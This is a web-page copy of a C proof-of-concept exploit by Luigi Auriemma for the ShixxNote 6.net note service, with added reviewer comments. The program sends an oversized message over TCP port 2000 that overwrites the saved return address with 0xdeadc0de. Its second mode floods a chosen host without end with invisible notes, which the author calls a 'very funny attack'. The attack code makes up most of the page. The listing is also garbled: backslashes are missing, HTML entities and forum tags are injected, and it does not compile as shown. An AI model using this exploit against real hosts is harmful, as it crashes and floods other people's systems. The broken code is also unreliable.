
ShixxNote 6.net buffer overflow exploit by luigi auriemma

ShixxNote 6.net buffer overflow exploit by luigi auriemma

文章作者:Luigi Auriemma
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
   #include <winsock.h>
   #include "winerr.h"

   #define close  closesocket
#else
   #include <unistd.h>
   #include <sys/socket.h>
   #include <sys/types.h>
   #include <arpa/inet.h>
   #include <netdb.h>
   #include <netinet/in.h>
#endif



/*
 * Build-time constants of the proof-of-concept.
 *
 * VER   - tool version string shown in the banner.
 * PORT  - TCP port used when no port argument is given (see main).
 * EIP   - four-byte marker placed inside the oversized message; per the
 *         author's comment it is the value the saved return address is
 *         overwritten with (0xdeadc0de).
 * BOF   - the oversized message: the text "attacker", two '~', a long
 *         run of 'a' filler with the EIP marker embedded in it, and a
 *         trailing run of '~'. It contains only filler and the marker,
 *         no executable payload, so it presumably demonstrates the
 *         overwrite by crashing the receiver rather than running code.
 * FLOOD - a short message made only of '~' characters, sent repeatedly
 *         by the second mode.
 *
 * NOTE(review): '~' looks like a field separator of the note protocol;
 * the listing does not say so, confirm against the protocol.
 *
 * NOTE(review): as rendered on this page the backslashes are missing
 * (byte escapes in EIP, line continuations of the multi-line BOF macro),
 * so the listing does not compile as shown.
 *
 * Defender's view: both messages are sent straight after connect(), with
 * no handshake or credentials anywhere in this listing. A field far
 * longer than any legitimate note field, or a burst of very short
 * connections carrying only separators, is the traffic to look for on
 * the note port; limiting that port to trusted hosts reduces exposure.
 */
#define VER    "0.1"
#define PORT    2000
#define EIP    "xdexc0xadxde"  /* return address = 0xdeadc0de */
#define BOF    "attacker"
           "~~"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" EIP "aaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
           "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~~~~~~~~~~~~~~~~~~~"
#define FLOOD  "~~~~~~~~~~~~~~~~~~~~~~"



/* Turns a dotted-quad string or a hostname into an IPv4 address value;
 * exits the process when the name cannot be resolved. */
u_long resolv(char *host);
/* Reports the last error and exits. This file defines it only for
 * non-WIN32 builds; the WIN32 version presumably comes from "winerr.h". */
void std_err(void);



/*
 * Command-line driver of the proof-of-concept.
 *
 * Arguments, as given by the usage text: argv[1] selects the mode,
 * argv[2] is the server, optional argv[3] is the TCP port (default PORT).
 * Mode '2' loops forever sending FLOOD over fresh connections; any other
 * mode value sends BOF once. The program never reads a reply, so its
 * closing message states an expectation, not a verified result.
 *
 * Returns 0 after the single-send mode; every failure path ends the
 * process through exit(1) (usage error, resolv(), std_err()).
 *
 * NOTE(review): as rendered on this page the newline escapes have lost
 * their backslash ("n"), the character literals are HTML-entity encoded
 * (&#39;) and forum tags ([email], [url]) were injected into the banner,
 * so this listing does not compile as shown.
 */
int main(int argc, char *argv[]) {
   int    sd;
   u_short port = PORT;
   struct  sockaddr_in peer;


   /* Unbuffered stdout so progress output appears immediately. */
   setbuf(stdout, NULL);

   /* Banner. */
   fputs("n"
      "ShixxNote 6.net buffer overflow "VER"n"
      "by Luigi Auriemman"
      "e-mail: [email]aluigi@altervista.orgn[/email]"
      "web:    [url]http://aluigi.altervista.orgn[/url]"
      "n", stdout);

   /* Mode and server are mandatory; this check also guarantees that
    * argv[1] and argv[2] exist before they are read below. */
   if(argc < 3) {
      printf("nUsage: %s <attack> <server> [port(%d)]n"
        "n"
        "Attack:n"
        "1 = buffer-overflow, the return address will be overwritten with 0xdeadc0den"
        "2 = silent flood, the remote host will be flooded by tons of invisible notesn"
        "    (very funny attack, moreover if the victim has sounds enabled)n"
        "n", argv[0], PORT);
      exit(1);
   }

#ifdef WIN32
   /* NOTE(review): the WSAStartup() return value is not checked. */
   WSADATA    wsadata;
   WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

   /* NOTE(review): atoi() reports no errors and its int result is stored
    * in a u_short without a range check. */
   if(argc > 3) port = atoi(argv[3]);

   /* resolv() exits the process itself when the name cannot be resolved. */
   peer.sin_addr.s_addr = resolv(argv[2]);
   peer.sin_port      = htons(port);
   peer.sin_family     = AF_INET;

   printf("- target  %s:%hun",
      inet_ntoa(peer.sin_addr), port);

   /* Only the first character of the mode argument is examined. */
   if(argv[1][0] == &#39;2&#39;) {
      /* Flood mode: one new TCP connection per iteration, FLOOD sent,
       * connection closed, one '.' printed. The loop has no exit other
       * than std_err() on a failed call. Seen from the service this is a
       * stream of very short connections that each carry only the
       * separator characters. */
      for(;;) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        /* sizeof - 1 leaves out the string literal's terminating NUL. */
        if(send(sd, FLOOD, sizeof(FLOOD) - 1, 0)
          < 0) std_err();
        close(sd);
        fputc(&#39;.&#39;, stdout);
      }
   } else {
      /* Single-send mode: one connection, BOF sent once, then closed.
       * Nothing is read back from the server. */
      sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      if(sd < 0) std_err();
      fputs("- connectionn", stdout);
      if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
       < 0) std_err();
      fputs("- send buffer-overflow datan", stdout);
      if(send(sd, BOF, sizeof(BOF) - 1, 0)
       < 0) std_err();
      close(sd);
   }

   /* Reached only from the single-send branch, since the flood loop never
    * falls through.
    * NOTE(review): this reads sizeof(u_long) bytes from a string literal
    * through a cast pointer; where u_long is wider than four bytes the
    * printed value includes bytes beyond the four-byte marker. */
   printf("- the return address should be overwritten with 0x%08lxnn",
      *(u_long *)EIP);

   return(0);
}



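/*
 * Convert a host string into an IPv4 address in network byte order.
 *
 * host: dotted-quad text or a hostname.
 *
 * The string is first parsed with inet_addr(); only when that yields
 * INADDR_NONE is gethostbyname() consulted. Returns the address value.
 * On failure to resolve, prints an error to stdout and exits with
 * status 1, so the function never returns an invalid address.
 */
u_long resolv(char *host) {
   struct hostent *hp;
   struct in_addr  addr;

   addr.s_addr = inet_addr(host);
   if(addr.s_addr != INADDR_NONE) return(addr.s_addr);

   hp = gethostbyname(host);
   /* Accept only an IPv4 answer of the expected size: the result is
    * copied into a 4-byte s_addr below. */
   if(!hp || hp->h_addrtype != AF_INET || !hp->h_addr_list[0]
      || hp->h_length != (int)sizeof(addr.s_addr)) {
      printf("\nError: Unable to resolve hostname (%s)\n", host);
      exit(1);
   }

   /* Copy exactly the address bytes. Dereferencing the buffer as a
    * u_long reads past the 4-byte address where u_long is wider, and
    * assumes an alignment the buffer does not promise. */
   memcpy(&addr.s_addr, hp->h_addr_list[0], sizeof(addr.s_addr));
   return(addr.s_addr);
}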



#ifndef WIN32
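   /*
    * Report the most recent failed library call through perror() and end
    * the process with exit status 1. Never returns.
    *
    * The message prefix starts with a newline escape; the page rendering
    * had dropped its backslash, which left a literal 'n' in the output.
    */
   void std_err(void) {
      perror("\nError");
      exit(1);
   }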
#endif